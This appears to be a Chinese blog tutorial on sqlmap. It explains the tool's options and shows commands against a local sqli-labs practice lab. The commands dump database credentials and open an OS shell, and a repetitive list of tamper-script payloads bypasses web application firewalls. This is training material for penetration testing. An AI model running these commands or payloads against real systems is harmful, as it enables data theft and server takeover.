SQL注入工具Sqlmap

news/2024/7/8 3:41:43 标签: sql, 数据库, 网络, 网络安全, 系统安全, 安全, linux

一、什么是Sqlmap

Sqlmap是一款开源的渗透测试工具,主要用于自动化检测和利用SQL注入漏洞,并能实现数据库服务器的接管。Sqlmap提供了多种功能和选项,包括数据库指纹识别、数据读取、文件系统访问以及通过带外数据连接执行系统命令等。它支持广泛的数据库类型,如MySQL、Oracle、PostgreSQL、Microsoft SQL Server等多种常见数据库管理系统。同时,Sqlmap还支持多种类型的SQL注入技术,例如基于布尔的盲注、基于时间的盲注、基于报错的注入、联合查询注入和堆叠查询注入等。使用方法:python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。

官网下载地址:https://github.com/sqlmapproject/sqlmap

官方使用指南:https://github.com/sqlmapproject/sqlmap/wiki/Usage

二、Sqlmap参数介绍

-u
使用方法:python sqlmap.py -u [URL]
描述:该参数用于指定需要测试的URL,通常是GET类型注入的必备参数。
--batch
使用方法:python sqlmap.py -u [URL] --batch
描述:使用该参数可以在所有需要用户输入的部分(通常是询问执行yes还是no)时,自动选择默认操作,不需要用户再次输入。
--flush-session
使用方法:python sqlmap.py -u [URL] --flush-session
描述:该参数表示清除当前目标的会话文件。Sqlmap在测试某一目标URL后会生成包含本次测试结果信息的session文件,当想重新测试该目标URL时,可使用此参数。
--dbms
使用方法:python sqlmap.py -u [URL] --dbms [数据库名]
描述:该参数用于指定数据库类型。Sqlmap默认情况下会自动检测Web应用程序的后端数据库管理系统,但当你明确知道要测试的数据库类型时,可以使用此参数指定。
--level
使用方法:python sqlmap.py -u [URL] --level [等级]
描述:该参数用于指定payload测试复杂等级,共有五个级别(1-5),默认值为1。等级越高,测试的payload越复杂。当低等级注入不成功时,可以逐步提高等级尝试。
--random-agent
使用方法:python sqlmap.py -u [URL] --random-agent
描述:使用该参数,Sqlmap将随机选择请求头中的User-Agent进行请求,而不是使用默认的User-Agent。
--user-agent
使用方法:python sqlmap.py -u [URL] --user-agent="自定义User-Agent"
描述:该参数允许用户指定自定义的User-Agent字符串。
--tamper
使用方法:python sqlmap.py -u [URL] --tamper [脚本路径1],[脚本路径2]...
描述:该参数用于指定篡改脚本的路径,可以帮助绕过Web应用防火墙(WAF)和其他防御机制。常用的tamper脚本包括space2comment.py和between.py。
--technique
使用方法:python sqlmap.py -u [URL] --technique [注入类型选项]
描述:该参数用于指定要测试的SQL注入类型。Sqlmap默认会测试所有类型的注入,但可以使用此参数指定具体的注入类型,例如"BE"表示只测试布尔盲注和基于错误的注入。

三、Sqlmap基本使用 

sqllabs第9关为例

get请求基础用法

#获取所有数据库名称
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --dbs
#获取当前数据库
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --current-db
#获取数据库security所有表名称
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --tables -D security
#获取数据库security的users表的所有列名
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --columns -D security -T users
#获取数据库security的users表的username和password列的值
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --dump -D security -T users -C username,password
#写马
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --os-shell 

post请求  --data

#获取所有数据库名称
python sqlmap.py -u "http://192.168.93.128/sqli-labs-master/Less-11/" --data "uname=312&passwd=312&submit=Submit" --dbs
获取数据库security所有表名称
python sqlmap.py -u "http://192.168.93.128/sqli-labs-master/Less-11/" --data "uname=312&passwd=312&submit=Submit" -D security --tables
#获取数据库security的users表的所有列名
python sqlmap.py -u "http://192.168.93.128/sqli-labs-master/Less-11/" --data "uname=312&passwd=312&submit=Submit" -D security -T users --columns
#获取数据库security的users表的username和password列的值
python sqlmap.py -u "http://192.168.93.128/sqli-labs-master/Less-11/" --data "uname=312&passwd=312&submit=Submit" -D security -T users -C username,password --dump

指定文件(批量检测)-m

sqlmap -m urls.txt
指定要检测的文件(批量检测)-r
sqlmap -r http.txt  #http.txt是我们抓取的http的请求包
sqlmap -r http.txt -p username  #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
需要登录的网站  --cookie
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --cookie="抓取的cookie" #探测该url是否存在漏洞

进阶用法

检测是否有WAF   --identify-waf 
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --identify-waf
指定脚本进行绕过   --tamper 
详细看sqlmap_tamp注入的脚本.xlsx

sqlmap_tamp.xlsx文件内容:

实现方式
("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
("1' AND SLEEP(5)#")'MScgQU5EIFNMRUVQKDUpIw=='
('1 UNION SELECT foobar')'1 UNION SELECT foobar'
('SELECT id FROM users')'SELECT+id+FROM+users'
('1 UNION SELECT 2--')'1 UNIOUNIONN SELESELECTCT 2--'
('SELECT id FROM users')'SELECT%0Did%0DFROM%0Ausers'
('-1 UNION ALL SELECT')'-1 UNION SELECT'
('1 AND 1=1')"1 AND 1=1 and '0having'='0having'"
'1 AND 9227=9227' '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
* Input: SELECT * FROM users WHERE id=1 2 * Output: SELECT * FROM users WHERE id LIKE 1
Input: SELECT id FROM usersOutput: SELECT%08id%02FROM%0Fusers
('1 AND 9227=9227')'1%23%0AAND%23%0A9227=9227'
('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--'
* Input: SELECT FIELD FROM TABLE* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
('1 AND 9227=9227-- ')'1 AND 9227=9227-- sp_password'
* Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
* Input: INSERT* Output: InsERt
* Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
* Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users
* Input: SELECT * FROM users WHERE id=1 2 * Output: SELECT * FROM users WHERE id LIKE 1
('1 AND A > B')'1 AND GREATEST(A,B+1)=A'
tamper("1 AND '1'='1")'1 AND %00%271%00%27=%00%271'
('IFNULL(1, 2)')'IF(ISNULL(1),2,1)'
('1 AND 9227=9227')'1%23%0AAND%23%0A9227=9227'
('1 AND 2>1--')'1 /*!30874AND 2>1*/--'
Input: SELECT id FROM usersOutput: SELECT%0Bid%0BFROM%A0users
('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--'
('1 AND 2>1--')'1 /*!00000AND 2>1*/--'
('1 AND 9227=9227')'1--%0AAND--%0A9227=9227'
('SELECT id FROM users where id = 1')'SELECT%09id FROM users where id LIKE 1'
* Input: SELECT FIELD FROM TABLE* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
* Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
* Input: INSERT* Output: InsERt
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
* Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users
* Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa
1.("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")2."value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
* Input: 1 AND 9227=9227* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
('1 AND A > B')'1 AND GREATEST(A,B+1)=A'
tamper("1 AND '1'='1")'1 AND %00%271%00%27=%00%271'
('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--'
* Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
* Input: INSERT* Output: InsERt
* Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
* Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users
('1 AND A > B')'1 AND GREATEST(A,B+1)=A'
tamper("1 AND '1'='1")'1 AND %00%271%00%27=%00%271'
('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--'
* Input: SELECT FIELD FROM TABLE* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
* Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
* Input: INSERT* Output: InsERt
* Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
* Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users
('1 AND 1=1')'1 AND 1=1%00'
* Input: SELECT FIELD FROM%20TABLE* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
* Input: 1′ AND 1=1* Output: 1%bf%27 AND 1=1–%20
‘INSERT’ becomes ‘IN//S//ERT’

http://www.niftyadmin.cn/n/5536318.html

相关文章

mongodb-数据备份和恢复

mongodb-database-tools mongodb-database-tools是MongoDB官方提供的一组命令行工具,用于执行各种与MongoDB数据库相关的操作,包括备份、恢复、导入、导出、查询和转换数据等。这些工具可帮助开发人员和管理员轻松地管理MongoDB数据库。 以下是一些常用…

【总线】AXI4第六课时:寻址选项深入解析

大家好,欢迎来到今天的总线学习时间!如果你对电子设计、特别是FPGA和SoC设计感兴趣,那你绝对不能错过我们今天的主角——AXI4总线。作为ARM公司AMBA总线家族中的佼佼者,AXI4以其高性能和高度可扩展性,成为了现代电子系统中不可或缺的通信桥梁…

Android 12.0 通知发送过程源码分析-Framework

以下NotificationManagerService简称 NMS 1. 通知的发送: NotificationManager.notify(int id, Notification notification) 开始. 源码路径: /frameworks/base/core/java/android/app/NotificationManager.java/***发布通知以显示在状态栏中。 如果通知带有* 相同的 ID 已被…

「树莓派入门」树莓派进阶02-传感器应用与交通灯项目

传感器是树莓派实现智能化的关键。通过本教程,你可以开始尝试使用传感器来增强树莓派的功能。 一、传感器在树莓派中的作用 传感器是树莓派与外界环境交互的重要工具。它们可以检测各种物理量,如光、声音、温度等,并将这些物理量转换为电信号,供树莓派读取和处理。 二、数…

马工程刑法期末复习笔记重点2

马工程刑法期末复习笔记重点2

鸿蒙HarmonyOS深度探索课程

在这门课程中,我们将深入探索鸿蒙HarmonyOS平台的Java UI布局技术,结合新浪新闻、直聘App和华为商城等三个经典案例,从布局设计到实现细节,从交互体验到用户界面优化,逐步解析其UI布局的全面技术与设计思路。通过本课程…

【C语言】return 关键字

在C语言中,return是一个关键字,用于从函数中返回值或者结束函数的执行。它是函数的重要组成部分,负责将函数的计算结果返回给调用者,并可以提前终止函数的执行。 主要用途和原理: 返回值给调用者: 当函数执…